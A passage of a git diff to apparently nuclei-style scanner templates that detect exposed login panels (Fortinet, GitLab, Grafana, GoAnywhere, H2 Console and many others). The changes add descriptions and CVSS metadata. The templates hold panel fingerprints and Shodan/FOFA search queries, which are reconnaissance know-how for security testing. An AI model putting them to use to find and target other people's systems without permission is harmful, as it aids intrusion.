fofa-query: Fortimail && port=443 @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortinet-fortigate-panel.yaml b/exposed-panels/fortinet/fortinet-fortigate-panel.yaml index 655c8463d0..3dbf25a0bb 100644 --- a/exposed-panels/fortinet/fortinet-fortigate-panel.yaml +++ b/exposed-panels/fortinet/fortinet-fortigate-panel.yaml @@ -1,9 +1,14 @@ id: fortinet-fortigate-panel info: - name: Fortinet FortiGate SSL VPN Panel + name: Fortinet FortiGate SSL VPN Login Panel - Detect author: bsysop severity: info + description: Fortinet FortiGate SSL VPN login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,fortinet,fortigate requests: @@ -18,3 +23,5 @@ requests: part: body words: - "/remote/fgt_lang" + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortinet-panel.yaml b/exposed-panels/fortinet/fortinet-panel.yaml index afea1df7b2..a107058521 100644 --- a/exposed-panels/fortinet/fortinet-panel.yaml +++ b/exposed-panels/fortinet/fortinet-panel.yaml @@ -1,9 +1,14 @@ id: fortinet-panel info: - name: Fortinet Panel Login + name: Fortinet Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Fortinet login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"FORTINET LOGIN" tags: panel,fortinet @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortios-panel.yaml b/exposed-panels/fortinet/fortios-panel.yaml index 0f530b480b..a10f1b920b 100644 --- a/exposed-panels/fortinet/fortios-panel.yaml +++ b/exposed-panels/fortinet/fortios-panel.yaml @@ -1,19 +1,22 @@ id: fortios-panel info: - name: Fortios Exposed Panel + name: FortiOS Admin Login Panel - Detect author: canberbamber,Jna1 severity: info description: | - admin portal of fortios devices + FortiOS admin login panel was detected. reference: - https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:945408572 tags: panel,fortinet,fortios - requests: - raw: - | @@ -35,3 +38,5 @@ requests: - type: status status: - 403 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortitester-login-panel.yaml b/exposed-panels/fortinet/fortitester-login-panel.yaml index fd252171e3..b4a336d798 100644 --- a/exposed-panels/fortinet/fortitester-login-panel.yaml +++ b/exposed-panels/fortinet/fortitester-login-panel.yaml @@ -1,11 +1,16 @@ id: fortitester-login-panel info: - name: FortiTester Login Panel + name: Fortinet FortiTester Login Panel - Detect author: DhiyaneshDk severity: info + description: Fortinet FortiTester login panel was detected. reference: - https://www.fortinet.com/products/fortitester + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"FortiTester" @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fortinet/fortiweb-panel.yaml b/exposed-panels/fortinet/fortiweb-panel.yaml index 3d56792418..2112dd58a9 100644 --- a/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/exposed-panels/fortinet/fortiweb-panel.yaml @@ -1,9 +1,14 @@ id: fortiweb-login info: - name: Fortinet FortiWeb Login Panel + name: Fortinet FortiWeb Login Panel - Detect author: PR3R00T severity: info + description: Fortinet FortiWeb login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,fortinet,fortiweb,login requests: @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/froxlor-management-panel.yaml b/exposed-panels/froxlor-management-panel.yaml index f30021aeb8..88d30b8037 100644 --- a/exposed-panels/froxlor-management-panel.yaml +++ b/exposed-panels/froxlor-management-panel.yaml @@ -1,9 +1,14 @@ id: froxlor-management-panel info: - name: Froxlor Server Management Panel + name: Froxlor Server Management Login Panel - Detect author: DhiyaneshDK severity: info + description: Froxlor Server Management login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Froxlor Server Management Panel" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/ftm-manager-panel.yaml b/exposed-panels/ftm-manager-panel.yaml index 2a0f1671fe..297ce51660 100644 --- a/exposed-panels/ftm-manager-panel.yaml +++ b/exposed-panels/ftm-manager-panel.yaml @@ -1,10 +1,14 @@ id: ftm-manager-panel info: - name: FTM Manager Panel + name: Financial Transaction Manager Login Panel - Detect author: idealphase severity: info - description: FTM Manager Industry LTE Router. + description: Financial Transaction Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"FTM manager" @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fuelcms-panel.yaml b/exposed-panels/fuelcms-panel.yaml index 863dadcd8d..cfdcb2a323 100644 --- a/exposed-panels/fuelcms-panel.yaml +++ b/exposed-panels/fuelcms-panel.yaml @@ -1,9 +1,14 @@ id: fuelcms-panel info: - name: Fuel CMS Panel + name: Fuel CMS Login Panel - Detect author: Adam Crosser severity: info + description: Fuel CMS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,fuelcms,oss requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/fuji-xerox-printer-detect.yaml b/exposed-panels/fuji-xerox-printer-detect.yaml index 79f20f058b..9bde62bf25 100644 --- a/exposed-panels/fuji-xerox-printer-detect.yaml +++ b/exposed-panels/fuji-xerox-printer-detect.yaml @@ -1,9 +1,14 @@ id: fuji-xerox-printer-detect info: - name: Fuji xerox - Printer Detect + name: Fuji Xerox Printer Panel - Detect author: gy741 severity: info + description: Fuji Xerox printer panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Fuji Xerox Co., Ltd" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gargoyle-router.yaml b/exposed-panels/gargoyle-router.yaml index 0187b5b309..8aa781fdda 100644 --- a/exposed-panels/gargoyle-router.yaml +++ b/exposed-panels/gargoyle-router.yaml @@ -1,11 +1,16 @@ id: gargoyle-router info: - name: Gargoyle Router Management Utility + name: Gargoyle Router Management Utility Admin Login Panel - Detect author: DhiyaneshDk severity: info + description: Gargoyle Router Management Utility admin login panel was detected. reference: - https://www.exploit-db.com/ghdb/8004 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Gargoyle Router Management Utility" @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/genweb-plus-panel.yaml b/exposed-panels/genweb-plus-panel.yaml index 4d230e1a51..20d339fb02 100644 --- a/exposed-panels/genweb-plus-panel.yaml +++ b/exposed-panels/genweb-plus-panel.yaml @@ -1,9 +1,14 @@ id: gemweb-plus-panel info: - name: GEMweb Plus 500 Panel Detect + name: GEMweb Plus 500 Login Panel - Detect author: princechaddha severity: info + description: GEMweb Plus 500 login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,gemweb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/geoserver-login-panel.yaml b/exposed-panels/geoserver-login-panel.yaml index 4b7a3d4fba..f931ade8e7 100644 --- a/exposed-panels/geoserver-login-panel.yaml +++ b/exposed-panels/geoserver-login-panel.yaml @@ -1,9 +1,14 @@ id: geoserver-login-panel info: - name: GeoServer Login Panel + name: GeoServer Login Panel - Detect author: ritikchaddha severity: info + description: GeoServer login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"GeoServer" @@ -35,3 +40,5 @@ requests: group: 1 regex: - 'GeoServer ([0-9.]+)' + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gerapy-detect.yaml b/exposed-panels/gerapy-detect.yaml index ec07d92fe2..f9d702e9f1 100644 --- a/exposed-panels/gerapy-detect.yaml +++ b/exposed-panels/gerapy-detect.yaml @@ -1,9 +1,14 @@ id: gerapy-detect info: - name: Gerapy Detect + name: Gerapy Panel - Detect author: pikpikcu severity: info + description: Gerapy panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: tech,gerapy,panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gespage-panel.yaml b/exposed-panels/gespage-panel.yaml index f69543d4cf..5ee80f8931 100644 --- a/exposed-panels/gespage-panel.yaml +++ b/exposed-panels/gespage-panel.yaml @@ -1,9 +1,14 @@ id: gespage-panel info: - name: Gespage Panel Login + name: Gespage Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Gespage login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: Path=/gespage tags: panel,gespage @@ -32,3 +37,5 @@ requests: group: 1 regex: - '\(Ver: ([0-9._A-Z]+)\)' + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gira-homeserver-homepage.yaml b/exposed-panels/gira-homeserver-homepage.yaml index d427db9b05..d624aa09d5 100644 --- a/exposed-panels/gira-homeserver-homepage.yaml +++ b/exposed-panels/gira-homeserver-homepage.yaml @@ -1,9 +1,14 @@ id: gira-homeserver-homepage info: - name: Gira Homeserver Homepage + name: Gira HomeServer 4 Login Panel - Detect author: tess severity: info + description: Gira HomeServer 4 login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Gira HomeServer 4" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/git-repository-browser.yaml b/exposed-panels/git-repository-browser.yaml index 7f36f2fc50..e62fb1c54f 100644 --- a/exposed-panels/git-repository-browser.yaml +++ b/exposed-panels/git-repository-browser.yaml @@ -1,9 +1,14 @@ id: git-repository-browser info: - name: Git Repository Browser Detect + name: Git Repository Browser Panel - Detect author: tess severity: info + description: Git Repository Browser panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: http.title:"Git repository browser" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gitblit-panel.yaml b/exposed-panels/gitblit-panel.yaml index 0faf2b4918..98fb8f638d 100644 --- a/exposed-panels/gitblit-panel.yaml +++ b/exposed-panels/gitblit-panel.yaml @@ -1,9 +1,14 @@ id: gitblit-panel info: - name: Gitblit Login Panel Detect + name: Gitblit Login Panel - Detect author: tess severity: info + description: Gitblit login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: http.title:"Gitblit" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gitea-login.yaml b/exposed-panels/gitea-login.yaml index b816d38bce..a769a8f9ea 100644 --- a/exposed-panels/gitea-login.yaml +++ b/exposed-panels/gitea-login.yaml @@ -1,9 +1,14 @@ id: gitea-login info: - name: Gitea Login + name: Gitea Login Panel - Detect author: dhiyaneshDK severity: info + description: Gitea login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: html:"Powered by Gitea Version" tags: gitea,panel @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/github-enterprise-detect.yaml b/exposed-panels/github-enterprise-detect.yaml index bd47f4cd6d..95c54b1a80 100644 --- a/exposed-panels/github-enterprise-detect.yaml +++ b/exposed-panels/github-enterprise-detect.yaml @@ -1,9 +1,14 @@ id: github-enterprise-detect info: - name: Detect Github Enterprise + name: Github Enterprise Login Panel - Detect author: ehsahil severity: info + description: Github Enterprise login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,github requests: @@ -17,3 +22,5 @@ requests: - type: word words: - "GitHub · Enterprise" + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml index 2d0bd8b43e..dfac67a2e6 100644 --- a/exposed-panels/gitlab-detect.yaml +++ b/exposed-panels/gitlab-detect.yaml @@ -1,9 +1,14 @@ id: gitlab-detect info: - name: Detect Gitlab + name: Gitlab Login Panel - Detect author: ehsahil severity: info + description: Gitlab login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"GitLab" tags: panel,gitlab @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/15 diff --git a/exposed-panels/globalprotect-panel.yaml b/exposed-panels/globalprotect-panel.yaml index 4298d24801..12d7516976 100644 --- a/exposed-panels/globalprotect-panel.yaml +++ b/exposed-panels/globalprotect-panel.yaml @@ -1,9 +1,14 @@ id: globalprotect-panel info: - name: PaloAlto Networks GlobalProtect Panel + name: Palo Alto Networks GlobalProtect Login Panel - Detect author: organiccrap severity: info + description: Palo Alto Networks GlobalProtect login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,panos,globalprotect requests: @@ -19,3 +24,5 @@ requests: - "GlobalProtect Portal" - "Invalid parameters" condition: or + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/glpi-panel.yaml b/exposed-panels/glpi-panel.yaml index d91365daee..6ada96c5e3 100644 --- a/exposed-panels/glpi-panel.yaml +++ b/exposed-panels/glpi-panel.yaml @@ -1,12 +1,17 @@ id: glpi-project_glpi info: - name: GLPI + name: GLPI Panel - Detect author: dogasantos,daffainfo,ricardomaia,dhiyaneshDk severity: info + description: GLPI panel was detected. reference: - https://glpi-project.org/ - https://www.exploit-db.com/ghdb/7002 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"GLPI" @@ -39,3 +44,5 @@ requests: - '(?i)jquery\.min\.js\?v=([\d.|\d]+)">' - '(?i)# GLPI changes\n\n.*\n.*\n.*\n##\s\[(\d+\.\d+|\d+\.\d+\.\d+)\]' - '(?i)GLPI.*?([\d.|\d]+).copyright' + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/go-anywhere-client.yaml b/exposed-panels/go-anywhere-client.yaml index 8813f16cb8..51b6707aa1 100644 --- a/exposed-panels/go-anywhere-client.yaml +++ b/exposed-panels/go-anywhere-client.yaml @@ -1,9 +1,14 @@ id: go-anywhere-client info: - name: GoAnywhere client login detection + name: GoAnywhere Web Client Login Panel - Detect author: iamthefrogy severity: info + description: GoAnywhere Web Client login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,goanywhere,login requests: @@ -19,3 +24,5 @@ requests: - "Powered by GoAnywhere" - "GoAnywhere.com" condition: or + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/goanywhere-mft-login.yaml b/exposed-panels/goanywhere-mft-login.yaml index 98158057d8..749255c7f0 100644 --- a/exposed-panels/goanywhere-mft-login.yaml +++ b/exposed-panels/goanywhere-mft-login.yaml @@ -1,9 +1,14 @@ id: goanywhere-mft-login info: - name: GoAnywhere Managed File Transfer Login Panel + name: GoAnywhere Managed File Transfer Login Panel - Detect author: ritikchaddha severity: info + description: GoAnywhere Managed File Transfer login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"GoAnywhere Managed File Transfer" @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gocd-login.yaml b/exposed-panels/gocd-login.yaml index f641146d8e..b88e4f536c 100644 --- a/exposed-panels/gocd-login.yaml +++ b/exposed-panels/gocd-login.yaml @@ -1,9 +1,14 @@ id: gocd-login info: - name: GoCD Login + name: GoCD Login Panel - Detect author: dhiyaneshDK severity: info + description: GoCD login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: html:"GoCD Version" tags: go,panel,gocd @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gocron-panel.yaml b/exposed-panels/gocron-panel.yaml index 0665c5f30e..49dee207dd 100644 --- a/exposed-panels/gocron-panel.yaml +++ b/exposed-panels/gocron-panel.yaml @@ -1,9 +1,14 @@ id: gocron-panel info: - name: Gocron Panel Detect + name: Gocron Panel - Detect author: ffffffff0x severity: info + description: Gocron panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: app="gocron-定时任务系统" tags: gocron,panel @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gogs-panel.yaml b/exposed-panels/gogs-panel.yaml index 770c055156..3161ae2d99 100644 --- a/exposed-panels/gogs-panel.yaml +++ b/exposed-panels/gogs-panel.yaml @@ -1,11 +1,16 @@ id: gogs-panel info: - name: Gogs (Go Git Service) - Sign In Page + name: Gogs Login Panel - Detect author: DhiyaneshDk,daffainfo + severity: info + description: Gogs login panel was detected. reference: - https://gogs.io/ - severity: info + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Sign In - Gogs" @@ -35,3 +40,5 @@ requests: group: 1 regex: - 'Version: ([0-9.]+) Page:' + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gophish-login.yaml b/exposed-panels/gophish-login.yaml index e35d98a093..c44f70ce82 100644 --- a/exposed-panels/gophish-login.yaml +++ b/exposed-panels/gophish-login.yaml @@ -1,9 +1,14 @@ id: gophish-login info: - name: Gophish Login + name: Gophish Login Panel - Detect author: dhiyaneshDK severity: info + description: Gophish login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Gophish - Login" tags: panel,gophish @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gradle/gradle-cache-node-detect.yaml b/exposed-panels/gradle/gradle-cache-node-detect.yaml index ea02a39961..f4116e2f4b 100644 --- a/exposed-panels/gradle/gradle-cache-node-detect.yaml +++ b/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -1,11 +1,16 @@ id: gradle-cache-node-detect info: - name: Gradle Enterprise Build Cache Node Detect + name: Gradle Enterprise Build Cache Node Login Panel - Detect author: Adam Crosser severity: info + description: Gradle Enterprise Build Cache Node login panel was detected. reference: - https://gradle.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,gradle,cache requests: @@ -24,3 +29,5 @@ requests: group: 1 regex: - "Gradle Enterprise Build Cache Node (.*)" + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/gradle/gradle-enterprise-panel.yaml b/exposed-panels/gradle/gradle-enterprise-panel.yaml index 256d775193..281a08af24 100644 --- a/exposed-panels/gradle/gradle-enterprise-panel.yaml +++ b/exposed-panels/gradle/gradle-enterprise-panel.yaml @@ -1,9 +1,14 @@ id: gradle-enterprise-panel info: - name: Gradle Enterprise Panel Detect + name: Gradle Enterprise Login Panel - Detect author: Adam Crosser severity: info + description: Gradle Enterprise logjn panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,gradle requests: @@ -19,3 +24,5 @@ requests: part: body words: - "Gradle Enterprise" + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/grafana-detect.yaml b/exposed-panels/grafana-detect.yaml index 59fb403f4f..9241f73de1 100644 --- a/exposed-panels/grafana-detect.yaml +++ b/exposed-panels/grafana-detect.yaml @@ -1,9 +1,14 @@ id: grafana-detect info: - name: Grafana panel detect + name: Grafana Login Panel - Detect author: organiccrap severity: info + description: Grafana login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"Grafana" tags: panel,grafana @@ -23,3 +28,5 @@ requests: group: 1 regex: - 'Grafana ([v0-9.]+)' + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/grails-database-admin-console.yaml b/exposed-panels/grails-database-admin-console.yaml index 36d9892d47..9df841e2d5 100644 --- a/exposed-panels/grails-database-admin-console.yaml +++ b/exposed-panels/grails-database-admin-console.yaml @@ -1,11 +1,16 @@ id: grails-database-admin-console info: - name: Grails database admin console + name: Grails Admin Console Panel - Detect author: emadshanab severity: medium + description: Grails Admin Console panel was detected. reference: - https://www.acunetix.com/vulnerabilities/web/grails-database-console/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: grails,panel requests: @@ -24,3 +29,5 @@ requests: words: - "Sorry, remote connections ('webAllowOthers') are disabled on this server" negative: true + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/graphite-browser.yaml b/exposed-panels/graphite-browser.yaml index 2e9a35a392..a33c800075 100644 --- a/exposed-panels/graphite-browser.yaml +++ b/exposed-panels/graphite-browser.yaml @@ -1,11 +1,16 @@ id: graphite-browser info: - name: Graphite Browser Panel + name: Graphite Browser Login Panel - Detect author: 0x_Akoko severity: info + description: Graphite Browser login panel was detected. reference: - https://graphiteapp.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Graphite Browser" tags: graphite,panel @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/h2console-panel.yaml b/exposed-panels/h2console-panel.yaml index ecd30898ef..370952c5d3 100644 --- a/exposed-panels/h2console-panel.yaml +++ b/exposed-panels/h2console-panel.yaml @@ -1,12 +1,17 @@ id: h2console-panel info: - name: H2 console web panel + name: H2 Console Web Login Panel - Detect author: righettod severity: info + description: H2 Console Web login panel was detected. reference: - https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"H2 Console" tags: panel,h2,console @@ -23,3 +28,5 @@ requests: - "status_code==200" - "contains(tolower(body), 'h2 console')" condition: and + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml index 5f3f1b4a49..8fe9cdc85a 100644 --- a/exposed-panels/hadoop-exposure.yaml +++ b/exposed-panels/hadoop-exposure.yaml @@ -1,9 +1,14 @@ id: hadoop-exposure info: - name: Apache Hadoop Exposure + name: Apache Hadoop Panel - Detect author: pdteam severity: low + description: Apache Hadoop panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,apache,hadoop requests: @@ -14,3 +19,5 @@ requests: - type: word words: - '
Hadoop
' + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/hangfire-dashboard.yaml b/exposed-panels/hangfire-dashboard.yaml index 31a8bd6659..1a223bf94b 100644 --- a/exposed-panels/hangfire-dashboard.yaml +++ b/exposed-panels/hangfire-dashboard.yaml @@ -1,9 +1,14 @@ id: hangfire-dashboard info: - name: Hangfire Dashboard Panel + name: Hangfire Dashboard Panel - Detect author: DhiyaneshDk severity: low + description: Hangfire Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Overview – Hangfire Dashboard" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/harbor-panel.yaml b/exposed-panels/harbor-panel.yaml index dcbcbf1770..55c8c6f5f7 100644 --- a/exposed-panels/harbor-panel.yaml +++ b/exposed-panels/harbor-panel.yaml @@ -1,12 +1,16 @@ id: harbor-panel info: - name: Harbor Login Panel + name: Harbor Login Panel - Detect author: daffainfo severity: info - description: Harbor is an open source trusted cloud native registry project that stores, signs, and scans content. + description: Harbor login panel was detected. reference: - https://github.com/goharbor/harbor + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:657337228 @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/hashicorp-consul-webgui.yaml b/exposed-panels/hashicorp-consul-webgui.yaml index 3d22e71dad..f93c0b9e27 100644 --- a/exposed-panels/hashicorp-consul-webgui.yaml +++ b/exposed-panels/hashicorp-consul-webgui.yaml @@ -1,10 +1,14 @@ id: hashicorp-consul-webgui info: - name: HashiCorp Consul WebGUI Detection + name: HashiCorp Consul Web UI Login Panel - Detect author: c-sh0 severity: info - description: Detection of HashiCorp Consul WebGUI + description: HashiCorp Consul Web UI login panel was detected, + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Consul by HashiCorp" tags: consul,webserver,panel @@ -34,4 +38,6 @@ requests: part: body group: 1 regex: - - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" \ No newline at end of file + - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/highmail-admin-panel.yaml b/exposed-panels/highmail-admin-panel.yaml index c4125968b5..3fdf8b293c 100644 --- a/exposed-panels/highmail-admin-panel.yaml +++ b/exposed-panels/highmail-admin-panel.yaml @@ -1,9 +1,14 @@ id: highmail-admin-panel info: - name: HighMail Admin Panel + name: HighMail Admin Login Panel - Detect author: ritikchaddha severity: info + description: HighMail admin login panel was detected. + classification: + 